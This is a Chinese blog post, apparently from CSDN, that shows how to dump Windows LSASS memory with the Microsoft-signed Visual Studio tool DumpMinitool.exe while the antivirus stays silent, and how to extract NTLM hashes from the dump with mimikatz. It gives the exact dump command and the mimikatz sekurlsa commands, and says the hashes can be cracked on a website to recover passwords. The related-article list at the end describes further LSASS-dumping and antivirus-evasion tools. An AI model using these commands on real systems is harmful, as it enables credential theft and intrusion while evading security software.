绕过查杀工具实现lsass转储

最新推荐文章于 2023-08-22 23:12:12 发布
最新推荐文章于 2023-08-22 23:12:12 发布
阅读量915 收藏 1
点赞数
分类专栏: 安全与渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45237725/article/details/124528292
版权

最近看到mrd0x分享了一个程序通过此程序执行命令获取lsass转储文件,此文件是vs2022里的DumpMinitool.exe。此程序路径为:

C:\ProgramFiles\MicrosoftVisualStudio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions

接下来测试一下效果,先看一下程序信息

查看数字签名发现是微软,到这已经可以预见测试效果了,接下来开始正式测试。

使用火绒对程序扫描:

使用程序执行命令

DumpMinitool.exe --file lsass.dmp --processId 512 --dumpType Full

整个过程杀软没有任何动静。

dump完成后拿到本地使用mimikatz获取到ntlm,首先把lsass.dmp文件放到程序目录下,然后执行以下命令

mimikatz.exe
sekurlsa::minidump "lsass.dmp"
sekurlsa::logonpasswords

执行完成后,拿到账户的ntlm值,使用解密网站解密即可获取到密码。

文章中使用的相关工具关注微信公众号并后台回复 密码" 两字 即可获取

是阿星呀
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
MiniDump文件的生成(三)
kecise的专栏
08-17 3932
本文将详细的介绍MiniDumpCallback函数使用。使用该函数可以让MiniDumpWriteDump 1) 忽略某一可执行模块的信息(全部或部分); 2)忽略某一线程的信息(全部或部分); 3)将用户指定的内存空间的内容写入生成的DMP文件中。 1. MiniDumpCallback的声明如下: CallbackParam是用户为MiniDumpCallback自定义的参数。
几种免杀lsass进程的技巧
chenfeng857的博客
09-06 3092
在内网渗透进行横向移动和权限提升时,最常用的方法是通过dump进程lsass.exe,从中获得明文口令或者hash。lsass.exe(Local Security Authority Subsystem Service)是一个系统进程,用于微软Windows系统的安全机制,它用于本地安全和登陆策略。在进程空间中,存有着机器的域、本地用户名和密码等重要信息。但是需要首先获得一个高的权限才能对其进行访问。 在存在杀软防护的情况下,要想lsass进程,我首先想到的是procdump+Mimikatz 的方式
分享一个lsass.exe进程的工具
weixin_30398227的博客
07-26 515
dump_lsass_for_Win7_x64.c 和 dump_lsass_for_Win10_x64.c 是国外一位大佬写的专门lsass.exe进程的工具 参考链接:https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/ procdump.exe 是微软官方的进程工具,设计初衷是抓取崩溃进程...
dump文件,windbg
热门推荐
chinabinlang的专栏
10-29 2万+
dump文件,在VC中的调试还是非常非常非常有用的,因为我们也不会经每一行代码都加上日志,当然如果你愿意,也可以每一行都加上日志; 在Windows上,添加dump文件有两种方法: 方法一:一个是在程序中添加代码; 方法二:修改注册表(参考后面的bat文件写法,在win7上用管理员程序运行);建议用这个方法,方便实用;(http://blog.csdn.net/hgy413/article/...
Mimikatz免杀实战:过360核晶和defender
最新发布
xf555er的博客
08-22 2761
通常来说,即使我们成功实现了mimikatz的静态免杀,其抓取hash的行为仍可能会被防病毒软件检测到虽然你可以通过修改mimikatz的源码来实现行为上的免杀,但这需要花费大量的时间。我建议针对具体功能的代码来实现免杀,例如,mimikatz的dump hash功能主要依赖于Windows API的Minidump函数。
SassyKitdi:内核模式TCP套接字+LSASS .pdf
09-05
SassyKitdi:内核模式TCP套接字+LSASS web安全 应急响应 解决方案 安全研究 安全研究
SassyKitdi:内核模式TCP套接字+ LSASS(Rust Shellcode)
04-05
大多数感兴趣的代码在src / common / ntmem(LSASS)和src / common / nttdi(TCP套接字)库中。 所有的结构,类型,函数签名等都在src / common / ntdef中。 shellcode项目在src / payloads / sassykitdi中。 ...
Dumpert:LSASS内存器,使用直接系统调用和API脱钩
03-11
工具演示了如何使用直接系统调用和API取消钩子,并将这些技术结合到概念证明代码中,该代码可用于使用Cobalt Strike创建LSASS内存,而无需接触磁盘并逃避AV / EDR监控的用户模式API电话。 有关使用的技术的更...
LsassSilentProcessExit:命令行界面通过SilentProcessExit将LSASS内存到磁盘
04-13
导致WerFault.exe将lsass.exe进程内存到磁盘以通过静默进程退出机制提取凭据而又不破坏lsass.exe的新方法。 Usage: LsassSilentProcessExit.exe <PID> Where DumpMode can be: 0 - Call ...
dump_lsass:一个dumpWindows系统lsass.exe进程的工具
03-11
dump_lsass_for_Win7_x64.c和dump_lsass_for_Win10_x64.c是国外一位大佬写的lsass.exe进程工具,参考链接: ://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process procdump.exe是一个微软官方...
dump文件生成工具DumpTool
01-26
DumpTool主要用来在用户机器上对目标进程生成dump文件,定位“卡死”、Crash等问题。 (1)MiniDump: 表示生成一个包含必要信息的dump文件,文件大小约200-500k,具体Flag =MiniDumpNormal|MiniDumpWithThreadInfo|MiniDumpWithHandleData|MiniDumpWithIndirectlyReferencedMemory (2)FullDump: 表示生成一个所有信息的完全dump文件,文件大小可能超过100M。 (3)生成的dump文件路径位于exe目录下的dump文件,文件名 2010-01-26 12.33.50_3256.dmp 前面部分表示日期,后面的3256表示进程ID。 (4)如果进程有多个实例,每个进程都会生成一个dump。
minidump工具
03-19
当一个程序卡住的时候,可对这个程序产生一个dump文件,有效分析程序卡死的原因
导出windows密码技巧总结
渗透测试研究中心
12-16 6193
一、使用RPC控制lsass加载SSP,实现DUMP LSASS过杀软 1.已编译好的ssp.dll(建议自己编译) spp.dll 需要修改为完整的绝对路径,测试环境是win2012 管理员权限,提取的文件在C:\Windows\Temp\temp.bin,在windows 10 可能需要system权限。 编译成功的spp.dll文件以及loader注入器: https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/l
过卡巴斯基dump进程lsass.exe内存
xiangshen1990的博客
03-15 6919
过卡巴斯基dump进程lsass.exe内存1:简介2:流程2.1:编译XPN大牛的代码2.2:实现dump内存代码2.3:自动获取lsass.exe进程的pid3:效果 1:简介 起因是前两天看到QAX-Ateam的一篇关于渗透的文章《这是一篇“不一样”的真实渗透测试案例分析文章》,里面提到了学习XPN大牛的方法,过卡巴斯基的防护机制成功dump进程lsass.exe的内存,再将其下载到本地...
Windows获取密码及hash
LuckySec
05-04 3342
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
c++封装exe_渗透基础——从lsass.exe进程导出凭据
weixin_39900437的博客
11-28 358
0x00 前言本文将要结合自己的经验,介绍不同环境下从lsass.exe进程导出凭据的方法,结合利用思路,给出防御建议。 0x01 简介本文将要介绍以下内容:·从lsass.exe进程导出凭据的常用方法。·限制上传文件长度时导出凭据的方法。· 限制下载文件长度时导出凭据的方法。 0x02 从lsass.exe进程导出凭据的常用方法1.使用mimikatz直接导出凭据直接从lsass...
mimikatz+ProcDump离线读取win2008及以下用户密码
q996966912的博客
09-01 696
win2008读取普通用户密码
dump分析工具_你需要知道的 N 种抓取 dump 的工具
weixin_39905725的博客
11-23 848
前言今天,向大家介绍几种可以抓取应用程序文件的工具及基本使用方法。更详细的用法,请参考每个工具对应的帮助文档。如果你还不清楚什么是文件,不知道什么时候需要文件,请参考文件系列文章的第一篇 —— 文件知多少。各种抓取文件的工具有很多工具都可以抓取文件。我列举几个常用的工具并简单介绍使用方法。任务管理器 任务管理器是唾手可得的抓取文件的工具。按住 Ctrl + Shif...
Minidump 文件分析工具
dlj36的专栏
04-02 2万+
通常在荡机的瞬间,操作系统会形成一个存文件。 这个文件是当计算机死机的瞬间的内存的映像.该文件通常放置在系统目录下的minidum目录下.例如 C:/WINDOWS/Minidump/Mini082106-01.dmp. 所以对该文件的分析就能很快查找到问题的所在.  这个文件打开看看将发现是一堆乱码.怎么分析该文件呢.通常我们使用 microsoft 提供的 WinDbg 工具来分析.这
结束lsass.exe进程可能会导致系统蓝屏崩溃并自动重启的原因
06-13
lsass.exe(Local Security Authority Subsystem Service)是Windows操作系统中的一个进程,它负责处理本地安全机制。如果结束该进程,可能会导致系统认证和安全机制出现问题,从而引发蓝屏崩溃。此外,一些恶意软件会伪装成lsass.exe进程,如果误删可能会导致系统出现问题。因此,不建议随意结束lsass.exe进程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值